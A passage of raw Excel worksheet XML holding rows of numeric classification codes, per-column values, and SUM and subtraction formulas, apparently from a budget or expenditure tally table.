        <v>0</v>
      </c>
      <c r="AJ485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AK485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AL485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AM485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AN485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AO485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AP485" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
    </row>
    <row r="486" ht="18" customHeight="1" spans="1:42">
      <c r="A486" s="10"/>
      <c r="B486" s="16" t="s">
        <v>3315</v>
      </c>
      <c r="C486" s="17">
        <v>0</v>
      </c>
      <c r="D486" s="13">
        <v>2060999</v>
      </c>
      <c r="E486" s="16" t="s">
        <v>3316</v>
      </c>
      <c r="F486" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G486" s="17"/>
      <c r="H486" s="17"/>
      <c r="I486" s="17"/>
      <c r="J486" s="17"/>
      <c r="K486" s="17"/>
      <c r="L486" s="17"/>
      <c r="M486" s="17"/>
      <c r="N486" s="17"/>
      <c r="O486" s="17"/>
      <c r="P486" s="17"/>
      <c r="Q486" s="17"/>
      <c r="R486" s="17"/>
      <c r="S486" s="17"/>
      <c r="T486" s="17"/>
      <c r="U486" s="17"/>
      <c r="V486" s="17"/>
      <c r="W486" s="17"/>
      <c r="X486" s="17"/>
      <c r="Y486" s="17"/>
      <c r="Z486" s="17"/>
      <c r="AA486" s="17"/>
      <c r="AB486" s="17"/>
      <c r="AC486" s="17"/>
      <c r="AD486" s="17"/>
      <c r="AE486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AF486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AG486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AH486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AI486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AJ486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AK486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AL486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AM486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AN486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AO486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
      <c r="AP486" s="17">
        <f t="shared" si="232"/>
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="18" customHeight="1" spans="1:42">
      <c r="A487" s="10"/>
      <c r="B487" s="16" t="s">
        <v>3317</v>
      </c>
      <c r="C487" s="17">
        <v>0</v>
      </c>
      <c r="D487" s="13">
        <v>20699</v>
      </c>
      <c r="E487" s="11" t="s">
        <v>3318</v>
      </c>
      <c r="F487" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G487" s="12">
        <f t="shared" ref="G487:R487" si="233">SUM(G488:G491)</f>
        <v>0</v>
      </c>
      <c r="H487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="I487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="J487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="K487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="L487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="M487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="N487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="O487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="P487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="Q487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="R487" s="12">
        <f t="shared" si="233"/>
        <v>0</v>
      </c>
      <c r="S487" s="12">
        <v>0</v>
      </c>
      <c r="T487" s="12">
        <v>0</v>
      </c>
      <c r="U487" s="12">
        <v>0</v>
      </c>
      <c r="V487" s="12">
        <v>0</v>
      </c>
      <c r="W487" s="12">
        <v>0</v>
      </c>
      <c r="X487" s="12">
        <v>0</v>
      </c>
      <c r="Y487" s="12">
        <v>0</v>
      </c>
      <c r="Z487" s="12">
        <v>0</v>
      </c>
      <c r="AA487" s="12">
        <v>0</v>
      </c>
      <c r="AB487" s="12">
        <v>0</v>
      </c>
      <c r="AC487" s="12">
        <v>0</v>
      </c>
      <c r="AD487" s="12">
        <v>0</v>
      </c>
      <c r="AE487" s="12">
        <f t="shared" ref="AE487:AP487" si="234">SUM(AE488:AE491)</f>
        <v>0</v>
      </c>
      <c r="AF487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AG487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AH487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AI487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AJ487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AK487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AL487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AM487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AN487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AO487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
      <c r="AP487" s="12">
        <f t="shared" si="234"/>
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="18" customHeight="1" spans="1:42">
      <c r="A488" s="10"/>
      <c r="B488" s="16" t="s">
        <v>3319</v>
      </c>
      <c r="C488" s="17">
        <v>0</v>
      </c>
      <c r="D488" s="13">
        <v>2069901</v>
      </c>
      <c r="E488" s="16" t="s">
        <v>3320</v>
      </c>
      <c r="F488" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G488" s="17"/>
      <c r="H488" s="17"/>
      <c r="I488" s="17"/>
      <c r="J488" s="17"/>
      <c r="K488" s="17"/>
      <c r="L488" s="17"/>
      <c r="M488" s="17"/>
      <c r="N488" s="17"/>
      <c r="O488" s="17"/>
      <c r="P488" s="17"/>
      <c r="Q488" s="17"/>
      <c r="R488" s="17"/>
      <c r="S488" s="17"/>
      <c r="T488" s="17"/>
      <c r="U488" s="17"/>
      <c r="V488" s="17"/>
      <c r="W488" s="17"/>
      <c r="X488" s="17"/>
      <c r="Y488" s="17"/>
      <c r="Z488" s="17"/>
      <c r="AA488" s="17"/>
      <c r="AB488" s="17"/>
      <c r="AC488" s="17"/>
      <c r="AD488" s="17"/>
      <c r="AE488" s="17">
        <f t="shared" ref="AE488:AP491" si="235">G488-S488</f>
        <v>0</v>
      </c>
      <c r="AF488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AG488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AH488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AI488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AJ488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AK488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AL488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AM488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AN488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AO488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AP488" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="18" customHeight="1" spans="1:42">
      <c r="A489" s="10"/>
      <c r="B489" s="16" t="s">
        <v>3321</v>
      </c>
      <c r="C489" s="17">
        <v>0</v>
      </c>
      <c r="D489" s="13">
        <v>2069902</v>
      </c>
      <c r="E489" s="16" t="s">
        <v>3322</v>
      </c>
      <c r="F489" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G489" s="17"/>
      <c r="H489" s="17"/>
      <c r="I489" s="17"/>
      <c r="J489" s="17"/>
      <c r="K489" s="17"/>
      <c r="L489" s="17"/>
      <c r="M489" s="17"/>
      <c r="N489" s="17"/>
      <c r="O489" s="17"/>
      <c r="P489" s="17"/>
      <c r="Q489" s="17"/>
      <c r="R489" s="17"/>
      <c r="S489" s="17"/>
      <c r="T489" s="17"/>
      <c r="U489" s="17"/>
      <c r="V489" s="17"/>
      <c r="W489" s="17"/>
      <c r="X489" s="17"/>
      <c r="Y489" s="17"/>
      <c r="Z489" s="17"/>
      <c r="AA489" s="17"/>
      <c r="AB489" s="17"/>
      <c r="AC489" s="17"/>
      <c r="AD489" s="17"/>
      <c r="AE489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AF489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AG489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AH489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AI489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AJ489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AK489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AL489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AM489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AN489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AO489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AP489" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="18" customHeight="1" spans="1:42">
      <c r="A490" s="10"/>
      <c r="B490" s="16" t="s">
        <v>3323</v>
      </c>
      <c r="C490" s="17">
        <v>0</v>
      </c>
      <c r="D490" s="13">
        <v>2069903</v>
      </c>
      <c r="E490" s="16" t="s">
        <v>3324</v>
      </c>
      <c r="F490" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G490" s="17"/>
      <c r="H490" s="17"/>
      <c r="I490" s="17"/>
      <c r="J490" s="17"/>
      <c r="K490" s="17"/>
      <c r="L490" s="17"/>
      <c r="M490" s="17"/>
      <c r="N490" s="17"/>
      <c r="O490" s="17"/>
      <c r="P490" s="17"/>
      <c r="Q490" s="17"/>
      <c r="R490" s="17"/>
      <c r="S490" s="17"/>
      <c r="T490" s="17"/>
      <c r="U490" s="17"/>
      <c r="V490" s="17"/>
      <c r="W490" s="17"/>
      <c r="X490" s="17"/>
      <c r="Y490" s="17"/>
      <c r="Z490" s="17"/>
      <c r="AA490" s="17"/>
      <c r="AB490" s="17"/>
      <c r="AC490" s="17"/>
      <c r="AD490" s="17"/>
      <c r="AE490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AF490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AG490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AH490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AI490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AJ490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AK490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AL490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AM490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AN490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AO490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AP490" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="18" customHeight="1" spans="1:42">
      <c r="A491" s="10"/>
      <c r="B491" s="16" t="s">
        <v>3325</v>
      </c>
      <c r="C491" s="17">
        <v>0</v>
      </c>
      <c r="D491" s="13">
        <v>2069999</v>
      </c>
      <c r="E491" s="16" t="s">
        <v>3326</v>
      </c>
      <c r="F491" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G491" s="17"/>
      <c r="H491" s="17"/>
      <c r="I491" s="17"/>
      <c r="J491" s="17"/>
      <c r="K491" s="17"/>
      <c r="L491" s="17"/>
      <c r="M491" s="17"/>
      <c r="N491" s="17"/>
      <c r="O491" s="17"/>
      <c r="P491" s="17"/>
      <c r="Q491" s="17"/>
      <c r="R491" s="17"/>
      <c r="S491" s="17"/>
      <c r="T491" s="17"/>
      <c r="U491" s="17"/>
      <c r="V491" s="17"/>
      <c r="W491" s="17"/>
      <c r="X491" s="17"/>
      <c r="Y491" s="17"/>
      <c r="Z491" s="17"/>
      <c r="AA491" s="17"/>
      <c r="AB491" s="17"/>
      <c r="AC491" s="17"/>
      <c r="AD491" s="17"/>
      <c r="AE491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AF491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AG491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AH491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AI491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AJ491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AK491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AL491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AM491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AN491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AO491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
      <c r="AP491" s="17">
        <f t="shared" si="235"/>
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="18" customHeight="1" spans="1:42">
      <c r="A492" s="10"/>
      <c r="B492" s="16" t="s">
        <v>3327</v>
      </c>
      <c r="C492" s="17">
        <v>0</v>
      </c>
      <c r="D492" s="13">
        <v>207</v>
      </c>
      <c r="E492" s="11" t="s">
        <v>3328</v>
      </c>
      <c r="F492" s="14">
        <f t="shared" si="214"/>
        <v>930</v>
      </c>
      <c r="G492" s="12">
        <f t="shared" ref="G492:R492" si="236">SUM(G493,G509,G517,G528,G537,G545)</f>
        <v>81</v>
      </c>
      <c r="H492" s="12">
        <f t="shared" si="236"/>
        <v>115</v>
      </c>
      <c r="I492" s="12">
        <f t="shared" si="236"/>
        <v>165</v>
      </c>
      <c r="J492" s="12">
        <f t="shared" si="236"/>
        <v>221</v>
      </c>
      <c r="K492" s="12">
        <f t="shared" si="236"/>
        <v>240</v>
      </c>
      <c r="L492" s="12">
        <f t="shared" si="236"/>
        <v>96</v>
      </c>
      <c r="M492" s="12">
        <f t="shared" si="236"/>
        <v>44</v>
      </c>
      <c r="N492" s="12">
        <f t="shared" si="236"/>
        <v>0</v>
      </c>
      <c r="O492" s="12">
        <f t="shared" si="236"/>
        <v>94</v>
      </c>
      <c r="P492" s="12">
        <f t="shared" si="236"/>
        <v>46</v>
      </c>
      <c r="Q492" s="12">
        <f t="shared" si="236"/>
        <v>24</v>
      </c>
      <c r="R492" s="12">
        <f t="shared" si="236"/>
        <v>0</v>
      </c>
      <c r="S492" s="12">
        <v>73</v>
      </c>
      <c r="T492" s="12">
        <v>101</v>
      </c>
      <c r="U492" s="12">
        <v>148</v>
      </c>
      <c r="V492" s="12">
        <v>198</v>
      </c>
      <c r="W492" s="12">
        <v>213</v>
      </c>
      <c r="X492" s="12">
        <v>79</v>
      </c>
      <c r="Y492" s="12">
        <v>40</v>
      </c>
      <c r="Z492" s="12">
        <v>0</v>
      </c>
      <c r="AA492" s="12">
        <v>85</v>
      </c>
      <c r="AB492" s="12">
        <v>41</v>
      </c>
      <c r="AC492" s="12">
        <v>22</v>
      </c>
      <c r="AD492" s="12">
        <v>0</v>
      </c>
      <c r="AE492" s="12">
        <f t="shared" ref="AE492:AP492" si="237">SUM(AE493,AE509,AE517,AE528,AE537,AE545)</f>
        <v>8</v>
      </c>
      <c r="AF492" s="12">
        <f t="shared" si="237"/>
        <v>14</v>
      </c>
      <c r="AG492" s="12">
        <f t="shared" si="237"/>
        <v>17</v>
      </c>
      <c r="AH492" s="12">
        <f t="shared" si="237"/>
        <v>23</v>
      </c>
      <c r="AI492" s="12">
        <f t="shared" si="237"/>
        <v>27</v>
      </c>
      <c r="AJ492" s="12">
        <f t="shared" si="237"/>
        <v>17</v>
      </c>
      <c r="AK492" s="12">
        <f t="shared" si="237"/>
        <v>4</v>
      </c>
      <c r="AL492" s="12">
        <f t="shared" si="237"/>
        <v>0</v>
      </c>
      <c r="AM492" s="12">
        <f t="shared" si="237"/>
        <v>9</v>
      </c>
      <c r="AN492" s="12">
        <f t="shared" si="237"/>
        <v>5</v>
      </c>
      <c r="AO492" s="12">
        <f t="shared" si="237"/>
        <v>2</v>
      </c>
      <c r="AP492" s="12">
        <f t="shared" si="237"/>
        <v>0</v>
      </c>
    </row>
    <row r="493" ht="18" customHeight="1" spans="1:42">
      <c r="A493" s="10"/>
      <c r="B493" s="16" t="s">
        <v>3329</v>
      </c>
      <c r="C493" s="17">
        <v>0</v>
      </c>
      <c r="D493" s="13">
        <v>20701</v>
      </c>
      <c r="E493" s="11" t="s">
        <v>3330</v>
      </c>
      <c r="F493" s="14">
        <f t="shared" si="214"/>
        <v>930</v>
      </c>
      <c r="G493" s="12">
        <f t="shared" ref="G493:R493" si="238">SUM(G494:G508)</f>
        <v>81</v>
      </c>
      <c r="H493" s="12">
        <f t="shared" si="238"/>
        <v>115</v>
      </c>
      <c r="I493" s="12">
        <f t="shared" si="238"/>
        <v>165</v>
      </c>
      <c r="J493" s="12">
        <f t="shared" si="238"/>
        <v>221</v>
      </c>
      <c r="K493" s="12">
        <f t="shared" si="238"/>
        <v>240</v>
      </c>
      <c r="L493" s="12">
        <f t="shared" si="238"/>
        <v>96</v>
      </c>
      <c r="M493" s="12">
        <f t="shared" si="238"/>
        <v>44</v>
      </c>
      <c r="N493" s="12">
        <f t="shared" si="238"/>
        <v>0</v>
      </c>
      <c r="O493" s="12">
        <f t="shared" si="238"/>
        <v>94</v>
      </c>
      <c r="P493" s="12">
        <f t="shared" si="238"/>
        <v>46</v>
      </c>
      <c r="Q493" s="12">
        <f t="shared" si="238"/>
        <v>24</v>
      </c>
      <c r="R493" s="12">
        <f t="shared" si="238"/>
        <v>0</v>
      </c>
      <c r="S493" s="12">
        <v>73</v>
      </c>
      <c r="T493" s="12">
        <v>101</v>
      </c>
      <c r="U493" s="12">
        <v>148</v>
      </c>
      <c r="V493" s="12">
        <v>198</v>
      </c>
      <c r="W493" s="12">
        <v>213</v>
      </c>
      <c r="X493" s="12">
        <v>79</v>
      </c>
      <c r="Y493" s="12">
        <v>40</v>
      </c>
      <c r="Z493" s="12">
        <v>0</v>
      </c>
      <c r="AA493" s="12">
        <v>85</v>
      </c>
      <c r="AB493" s="12">
        <v>41</v>
      </c>
      <c r="AC493" s="12">
        <v>22</v>
      </c>
      <c r="AD493" s="12">
        <v>0</v>
      </c>
      <c r="AE493" s="12">
        <f t="shared" ref="AE493:AP493" si="239">SUM(AE494:AE508)</f>
        <v>8</v>
      </c>
      <c r="AF493" s="12">
        <f t="shared" si="239"/>
        <v>14</v>
      </c>
      <c r="AG493" s="12">
        <f t="shared" si="239"/>
        <v>17</v>
      </c>
      <c r="AH493" s="12">
        <f t="shared" si="239"/>
        <v>23</v>
      </c>
      <c r="AI493" s="12">
        <f t="shared" si="239"/>
        <v>27</v>
      </c>
      <c r="AJ493" s="12">
        <f t="shared" si="239"/>
        <v>17</v>
      </c>
      <c r="AK493" s="12">
        <f t="shared" si="239"/>
        <v>4</v>
      </c>
      <c r="AL493" s="12">
        <f t="shared" si="239"/>
        <v>0</v>
      </c>
      <c r="AM493" s="12">
        <f t="shared" si="239"/>
        <v>9</v>
      </c>
      <c r="AN493" s="12">
        <f t="shared" si="239"/>
        <v>5</v>
      </c>
      <c r="AO493" s="12">
        <f t="shared" si="239"/>
        <v>2</v>
      </c>
      <c r="AP493" s="12">
        <f t="shared" si="239"/>
        <v>0</v>
      </c>
    </row>
    <row r="494" ht="18" customHeight="1" spans="1:42">
      <c r="A494" s="10"/>
      <c r="B494" s="16" t="s">
        <v>3331</v>
      </c>
      <c r="C494" s="17">
        <v>0</v>
      </c>
      <c r="D494" s="13">
        <v>2070101</v>
      </c>
      <c r="E494" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F494" s="14">
        <f t="shared" si="214"/>
        <v>905</v>
      </c>
      <c r="G494" s="17">
        <v>77</v>
      </c>
      <c r="H494" s="17">
        <v>114</v>
      </c>
      <c r="I494" s="17">
        <v>165</v>
      </c>
      <c r="J494" s="17">
        <v>221</v>
      </c>
      <c r="K494" s="17">
        <v>240</v>
      </c>
      <c r="L494" s="17">
        <v>72</v>
      </c>
      <c r="M494" s="17">
        <v>44</v>
      </c>
      <c r="N494" s="17"/>
      <c r="O494" s="17">
        <v>93</v>
      </c>
      <c r="P494" s="17">
        <v>46</v>
      </c>
      <c r="Q494" s="17">
        <v>24</v>
      </c>
      <c r="R494" s="17"/>
      <c r="S494" s="17">
        <v>69</v>
      </c>
      <c r="T494" s="17">
        <v>100</v>
      </c>
      <c r="U494" s="17">
        <v>148</v>
      </c>
      <c r="V494" s="17">
        <v>198</v>
      </c>
      <c r="W494" s="17">
        <v>213</v>
      </c>
      <c r="X494" s="17">
        <v>64</v>
      </c>
      <c r="Y494" s="17">
        <v>40</v>
      </c>
      <c r="Z494" s="17"/>
      <c r="AA494" s="17">
        <v>84</v>
      </c>
      <c r="AB494" s="17">
        <v>41</v>
      </c>
      <c r="AC494" s="17">
        <v>22</v>
      </c>
      <c r="AD494" s="17"/>
      <c r="AE494" s="17">
        <f t="shared" ref="AE494:AP508" si="240">G494-S494</f>
        <v>8</v>
      </c>
      <c r="AF494" s="17">
        <f t="shared" si="240"/>
        <v>14</v>
      </c>
      <c r="AG494" s="17">
        <f t="shared" si="240"/>
        <v>17</v>
      </c>
      <c r="AH494" s="17">
        <f t="shared" si="240"/>
        <v>23</v>
      </c>
      <c r="AI494" s="17">
        <f t="shared" si="240"/>
        <v>27</v>
      </c>
      <c r="AJ494" s="17">
        <f t="shared" si="240"/>
        <v>8</v>
      </c>
      <c r="AK494" s="17">
        <f t="shared" si="240"/>
        <v>4</v>
      </c>
      <c r="AL494" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM494" s="17">
        <f t="shared" si="240"/>
        <v>9</v>
      </c>
      <c r="AN494" s="17">
        <f t="shared" si="240"/>
        <v>5</v>
      </c>
      <c r="AO494" s="17">
        <f t="shared" si="240"/>
        <v>2</v>
      </c>
      <c r="AP494" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="495" ht="18" customHeight="1" spans="1:42">
      <c r="A495" s="10"/>
      <c r="B495" s="16" t="s">
        <v>3332</v>
      </c>
      <c r="C495" s="17">
        <v>0</v>
      </c>
      <c r="D495" s="13">
        <v>2070102</v>
      </c>
      <c r="E495" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F495" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G495" s="17"/>
      <c r="H495" s="17"/>
      <c r="I495" s="17"/>
      <c r="J495" s="17"/>
      <c r="K495" s="17"/>
      <c r="L495" s="17"/>
      <c r="M495" s="17"/>
      <c r="N495" s="17"/>
      <c r="O495" s="17"/>
      <c r="P495" s="17"/>
      <c r="Q495" s="17"/>
      <c r="R495" s="17"/>
      <c r="S495" s="17"/>
      <c r="T495" s="17"/>
      <c r="U495" s="17"/>
      <c r="V495" s="17"/>
      <c r="W495" s="17"/>
      <c r="X495" s="17"/>
      <c r="Y495" s="17"/>
      <c r="Z495" s="17"/>
      <c r="AA495" s="17"/>
      <c r="AB495" s="17"/>
      <c r="AC495" s="17"/>
      <c r="AD495" s="17"/>
      <c r="AE495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP495" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="496" ht="18" customHeight="1" spans="1:42">
      <c r="A496" s="10"/>
      <c r="B496" s="16" t="s">
        <v>3333</v>
      </c>
      <c r="C496" s="17">
        <v>0</v>
      </c>
      <c r="D496" s="13">
        <v>2070103</v>
      </c>
      <c r="E496" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F496" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G496" s="17"/>
      <c r="H496" s="17"/>
      <c r="I496" s="17"/>
      <c r="J496" s="17"/>
      <c r="K496" s="17"/>
      <c r="L496" s="17"/>
      <c r="M496" s="17"/>
      <c r="N496" s="17"/>
      <c r="O496" s="17"/>
      <c r="P496" s="17"/>
      <c r="Q496" s="17"/>
      <c r="R496" s="17"/>
      <c r="S496" s="17"/>
      <c r="T496" s="17"/>
      <c r="U496" s="17"/>
      <c r="V496" s="17"/>
      <c r="W496" s="17"/>
      <c r="X496" s="17"/>
      <c r="Y496" s="17"/>
      <c r="Z496" s="17"/>
      <c r="AA496" s="17"/>
      <c r="AB496" s="17"/>
      <c r="AC496" s="17"/>
      <c r="AD496" s="17"/>
      <c r="AE496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP496" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="497" ht="18" customHeight="1" spans="1:42">
      <c r="A497" s="10"/>
      <c r="B497" s="16" t="s">
        <v>3334</v>
      </c>
      <c r="C497" s="17">
        <v>0</v>
      </c>
      <c r="D497" s="13">
        <v>2070104</v>
      </c>
      <c r="E497" s="16" t="s">
        <v>3335</v>
      </c>
      <c r="F497" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G497" s="17"/>
      <c r="H497" s="17"/>
      <c r="I497" s="17"/>
      <c r="J497" s="17"/>
      <c r="K497" s="17"/>
      <c r="L497" s="17"/>
      <c r="M497" s="17"/>
      <c r="N497" s="17"/>
      <c r="O497" s="17"/>
      <c r="P497" s="17"/>
      <c r="Q497" s="17"/>
      <c r="R497" s="17"/>
      <c r="S497" s="17"/>
      <c r="T497" s="17"/>
      <c r="U497" s="17"/>
      <c r="V497" s="17"/>
      <c r="W497" s="17"/>
      <c r="X497" s="17"/>
      <c r="Y497" s="17"/>
      <c r="Z497" s="17"/>
      <c r="AA497" s="17"/>
      <c r="AB497" s="17"/>
      <c r="AC497" s="17"/>
      <c r="AD497" s="17"/>
      <c r="AE497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ497" s="17">
        <f t="shared" si="240"/>
